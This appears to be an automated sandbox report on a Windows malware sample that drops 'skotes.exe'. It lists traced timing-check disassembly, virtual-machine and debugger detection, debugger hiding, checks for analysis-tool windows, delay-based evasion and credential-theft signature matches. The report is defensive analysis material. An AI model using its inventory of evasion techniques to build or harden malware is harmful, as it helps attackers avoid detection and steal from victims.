                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 541068B second address: 54106C9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6F31405BDBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp+04h], eax 0x0000000f jmp 00007F6F31405BE9h 0x00000014 pop eax 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F6F31405BDDh 0x0000001c rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54106C9 second address: 541072A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6F31ADDF71h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 call 00007F6F31ADDF69h 0x0000000e jmp 00007F6F31ADDF6Eh 0x00000013 push eax 0x00000014 pushad 0x00000015 pushad 0x00000016 mov si, 2599h 0x0000001a popad 0x0000001b mov ecx, 69458255h 0x00000020 popad 0x00000021 mov eax, dword ptr [esp+04h] 0x00000025 jmp 00007F6F31ADDF6Bh 0x0000002a mov eax, dword ptr [eax] 0x0000002c push eax 0x0000002d push edx 0x0000002e jmp 00007F6F31ADDF74h 0x00000033 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 541072A second address: 5410758 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F6F31405BE1h 0x00000009 sbb ax, 1946h 0x0000000e jmp 00007F6F31405BE1h 0x00000013 popfd 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5410758 second address: 5410780 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp+04h], eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F6F31ADDF79h 0x00000014 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5410780 second address: 5410786 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5410786 second address: 541078B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 541078B second address: 54107A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F6F31405BE0h 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54107A5 second address: 5410804 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov esi, ebx 0x00000005 mov si, di 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr fs:[00000000h] 0x00000011 pushad 0x00000012 pushfd 0x00000013 jmp 00007F6F31ADDF75h 0x00000018 and eax, 0FD90416h 0x0000001e jmp 00007F6F31ADDF71h 0x00000023 popfd 0x00000024 mov edi, eax 0x00000026 popad 0x00000027 nop 0x00000028 push eax 0x00000029 push edx 0x0000002a jmp 00007F6F31ADDF79h 0x0000002f rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5410804 second address: 5410814 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6F31405BDCh 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5410814 second address: 5410853 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a jmp 00007F6F31ADDF6Ch 0x0000000f call 00007F6F31ADDF72h 0x00000014 pushad 0x00000015 popad 0x00000016 pop eax 0x00000017 popad 0x00000018 nop 0x00000019 pushad 0x0000001a mov bl, 43h 0x0000001c mov eax, 2D0D11C5h 0x00000021 popad 0x00000022 sub esp, 1Ch 0x00000025 push eax 0x00000026 push edx 0x00000027 push eax 0x00000028 push edx 0x00000029 pushad 0x0000002a popad 0x0000002b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5410853 second address: 5410870 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6F31405BE9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5410870 second address: 5410876 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5410876 second address: 54108B7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 pushad 0x0000000a movzx ecx, di 0x0000000d mov cl, bl 0x0000000f popad 0x00000010 mov dword ptr [esp], ebx 0x00000013 jmp 00007F6F31405BE6h 0x00000018 xchg eax, esi 0x00000019 jmp 00007F6F31405BE0h 0x0000001e push eax 0x0000001f push eax 0x00000020 push edx 0x00000021 push eax 0x00000022 push edx 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54108B7 second address: 54108BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54108BB second address: 54108C1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54108C1 second address: 54108C7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54108C7 second address: 54108CB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54108CB second address: 541092B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, esi 0x00000009 pushad 0x0000000a jmp 00007F6F31ADDF73h 0x0000000f pushfd 0x00000010 jmp 00007F6F31ADDF78h 0x00000015 sub cx, C008h 0x0000001a jmp 00007F6F31ADDF6Bh 0x0000001f popfd 0x00000020 popad 0x00000021 xchg eax, edi 0x00000022 push eax 0x00000023 push edx 0x00000024 jmp 00007F6F31ADDF75h 0x00000029 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 541092B second address: 5410931 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5410931 second address: 5410935 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5410935 second address: 5410973 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F6F31405BE6h 0x0000000e xchg eax, edi 0x0000000f pushad 0x00000010 mov bh, al 0x00000012 push edi 0x00000013 mov eax, 7E92D055h 0x00000018 pop esi 0x00000019 popad 0x0000001a mov eax, dword ptr [76FBB370h] 0x0000001f push eax 0x00000020 push edx 0x00000021 jmp 00007F6F31405BDCh 0x00000026 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5410973 second address: 5410A1A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6F31ADDF6Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xor dword ptr [ebp-08h], eax 0x0000000c jmp 00007F6F31ADDF76h 0x00000011 xor eax, ebp 0x00000013 jmp 00007F6F31ADDF71h 0x00000018 nop 0x00000019 pushad 0x0000001a call 00007F6F31ADDF6Ch 0x0000001f pushfd 0x00000020 jmp 00007F6F31ADDF72h 0x00000025 jmp 00007F6F31ADDF75h 0x0000002a popfd 0x0000002b pop eax 0x0000002c push ebx 0x0000002d mov bh, ch 0x0000002f pop edx 0x00000030 popad 0x00000031 push eax 0x00000032 jmp 00007F6F31ADDF6Fh 0x00000037 nop 0x00000038 jmp 00007F6F31ADDF76h 0x0000003d lea eax, dword ptr [ebp-10h] 0x00000040 push eax 0x00000041 push edx 0x00000042 pushad 0x00000043 push eax 0x00000044 push edx 0x00000045 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5410A1A second address: 5410A20 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5410A20 second address: 5410A25 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5410A25 second address: 5410A6B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cx, 80ABh 0x00000007 pushad 0x00000008 popad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr fs:[00000000h], eax 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 mov edi, 60D7E94Ch 0x0000001a pushfd 0x0000001b jmp 00007F6F31405BE5h 0x00000020 sub ah, 00000026h 0x00000023 jmp 00007F6F31405BE1h 0x00000028 popfd 0x00000029 popad 0x0000002a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5410A6B second address: 5410A71 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5410A71 second address: 5410A75 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5410A75 second address: 5410A97 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6F31ADDF73h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov esi, dword ptr [ebp+08h] 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5410A97 second address: 5410A9B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5410A9B second address: 5410AB6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6F31ADDF77h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5410AB6 second address: 5410ABC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5410ABC second address: 5410AC0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5410AC0 second address: 5410B56 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esi+10h] 0x0000000b pushad 0x0000000c movsx edi, ax 0x0000000f mov dl, al 0x00000011 popad 0x00000012 test eax, eax 0x00000014 pushad 0x00000015 mov ch, dl 0x00000017 pushfd 0x00000018 jmp 00007F6F31405BE8h 0x0000001d adc ah, FFFFFFE8h 0x00000020 jmp 00007F6F31405BDBh 0x00000025 popfd 0x00000026 popad 0x00000027 jne 00007F6FA2EB4DFAh 0x0000002d pushad 0x0000002e pushfd 0x0000002f jmp 00007F6F31405BE4h 0x00000034 adc al, 00000048h 0x00000037 jmp 00007F6F31405BDBh 0x0000003c popfd 0x0000003d mov dx, ax 0x00000040 popad 0x00000041 sub eax, eax 0x00000043 jmp 00007F6F31405BDBh 0x00000048 mov dword ptr [ebp-20h], eax 0x0000004b push eax 0x0000004c push edx 0x0000004d jmp 00007F6F31405BE5h 0x00000052 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5410B56 second address: 5410BB6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop eax 0x00000005 jmp 00007F6F31ADDF73h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov ebx, dword ptr [esi] 0x0000000f pushad 0x00000010 pushfd 0x00000011 jmp 00007F6F31ADDF74h 0x00000016 sub si, 8868h 0x0000001b jmp 00007F6F31ADDF6Bh 0x00000020 popfd 0x00000021 mov ecx, 67EAAE5Fh 0x00000026 popad 0x00000027 mov dword ptr [ebp-24h], ebx 0x0000002a push eax 0x0000002b push edx 0x0000002c jmp 00007F6F31ADDF71h 0x00000031 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5410BB6 second address: 5410BD3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6F31405BE1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test ebx, ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5410BD3 second address: 5410BD7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5410BD7 second address: 5410BEA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6F31405BDFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5410BEA second address: 5410C6F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6F31ADDF79h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007F6FA358CFDCh 0x0000000f pushad 0x00000010 pushfd 0x00000011 jmp 00007F6F31ADDF6Ch 0x00000016 or si, 6AB8h 0x0000001b jmp 00007F6F31ADDF6Bh 0x00000020 popfd 0x00000021 pushfd 0x00000022 jmp 00007F6F31ADDF78h 0x00000027 add ecx, 45E0A518h 0x0000002d jmp 00007F6F31ADDF6Bh 0x00000032 popfd 0x00000033 popad 0x00000034 cmp ebx, FFFFFFFFh 0x00000037 push eax 0x00000038 push edx 0x00000039 push eax 0x0000003a push edx 0x0000003b jmp 00007F6F31ADDF70h 0x00000040 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5410C6F second address: 5410C73 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5410C73 second address: 5410C79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5410C79 second address: 54105A4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dx, si 0x00000006 call 00007F6F31405BE8h 0x0000000b pop ecx 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jmp 00007F6FA2EB4BB6h 0x00000014 jne 00007F6F31405BF9h 0x00000016 xor ecx, ecx 0x00000018 mov dword ptr [esi], ecx 0x0000001a mov dword ptr [esi+04h], ecx 0x0000001d mov dword ptr [esi+08h], ecx 0x00000020 mov dword ptr [esi+0Ch], ecx 0x00000023 mov dword ptr [esi+10h], ecx 0x00000026 mov dword ptr [esi+14h], ecx 0x00000029 mov ecx, dword ptr [ebp-10h] 0x0000002c mov dword ptr fs:[00000000h], ecx 0x00000033 pop ecx 0x00000034 pop edi 0x00000035 pop esi 0x00000036 pop ebx 0x00000037 mov esp, ebp 0x00000039 pop ebp 0x0000003a retn 0004h 0x0000003d nop 0x0000003e pop ebp 0x0000003f ret 0x00000040 add esi, 18h 0x00000043 pop ecx 0x00000044 cmp esi, 00F856A8h 0x0000004a jne 00007F6F31405BC0h 0x0000004c push esi 0x0000004d call 00007F6F31406443h 0x00000052 push ebp 0x00000053 mov ebp, esp 0x00000055 push dword ptr [ebp+08h] 0x00000058 call 00007F6F358D91A9h 0x0000005d mov edi, edi 0x0000005f push eax 0x00000060 push edx 0x00000061 jmp 00007F6F31405BE1h 0x00000066 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 541000A second address: 541000F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 541000F second address: 5410015 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: F8E8EB instructions caused by: Self-modifying code
                    Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 11B4760 instructions caused by: Self-modifying code
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSpecial instruction interceptor: First address: EFE8EB instructions caused by: Self-modifying code
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSpecial instruction interceptor: First address: 1124760 instructions caused by: Self-modifying code
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_05460D0E rdtsc 0_2_05460D0E
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeThread delayed: delay time: 180000Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow / User API: threadDelayed 475Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow / User API: threadDelayed 1168Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow / User API: threadDelayed 1122Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 5780Thread sleep time: -58029s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 4340Thread sleep count: 38 > 30Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 4340Thread sleep time: -76038s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 5596Thread sleep count: 475 > 30Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 5596Thread sleep time: -14250000s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 2676Thread sleep time: -360000s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 6044Thread sleep count: 1168 > 30Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 6044Thread sleep time: -2337168s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 3192Thread sleep count: 1122 > 30Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 3192Thread sleep time: -2245122s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\file.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeThread delayed: delay time: 30000Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeThread delayed: delay time: 180000Jump to behavior
                    Source: skotes.exe, skotes.exe, 00000006.00000002.2957881919.000000000107E000.00000040.00000001.01000000.00000007.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                    Source: skotes.exe, 00000006.00000002.2957282024.000000000068B000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000006.00000002.2957282024.0000000000658000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                    Source: file.exe, 00000000.00000002.1758083562.000000000110E000.00000040.00000001.01000000.00000003.sdmp, skotes.exe, 00000001.00000002.1786860547.000000000107E000.00000040.00000001.01000000.00000007.sdmp, skotes.exe, 00000002.00000002.1787078396.000000000107E000.00000040.00000001.01000000.00000007.sdmp, skotes.exe, 00000006.00000002.2957881919.000000000107E000.00000040.00000001.01000000.00000007.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                    Source: skotes.exe, 00000006.00000002.2957282024.000000000068B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW#
                    Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformationJump to behavior
                    Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior

                    Anti Debugging

                    barindex
                    Source: C:\Users\user\Desktop\file.exeThread information set: HideFromDebuggerJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeThread information set: HideFromDebuggerJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeThread information set: HideFromDebuggerJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeThread information set: HideFromDebuggerJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeOpen window title or class name: regmonclass
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeOpen window title or class name: gbdyllo
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeOpen window title or class name: procmon_window_class
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeOpen window title or class name: ollydbg
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeOpen window title or class name: filemonclass
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile opened: NTICE
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile opened: SICE
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile opened: SIWVID
                    Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_05460D0E rdtsc 0_2_05460D0E
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 6_2_00EC652B mov eax, dword ptr fs:[00000030h]6_2_00EC652B
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 6_2_00ECA302 mov eax, dword ptr fs:[00000030h]6_2_00ECA302
                    Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe" Jump to behavior
                    Source: skotes.exe, skotes.exe, 00000006.00000002.2957881919.000000000107E000.00000040.00000001.01000000.00000007.sdmpBinary or memory string: Program Manager
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 6_2_00EAD3E2 cpuid 6_2_00EAD3E2
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 6_2_00EACBEA GetSystemTimePreciseAsFileTime,GetSystemTimePreciseAsFileTime,6_2_00EACBEA
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 6_2_00E965E0 LookupAccountNameA,6_2_00E965E0

                    Stealing of Sensitive Information

                    barindex
                    Source: Yara matchFile source: 2.2.skotes.exe.e90000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.skotes.exe.e90000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 6.2.skotes.exe.e90000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.file.exe.f20000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000000.00000002.1757169218.0000000000F21000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000003.1714685020.0000000005260000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000006.00000003.2310587300.00000000048D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000002.1786704967.0000000000E91000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000003.1743754527.0000000004A10000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000003.1743788410.0000000004D50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.1786941479.0000000000E91000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000006.00000002.2957757618.0000000000E91000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                    Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
                    Command and Scripting Interpreter
                    1
                    Scheduled Task/Job
                    12
                    Process Injection
                    1
                    Masquerading
                    OS Credential Dumping1
                    System Time Discovery
                    Remote Services1
                    Archive Collected Data
                    1
                    Encrypted Channel
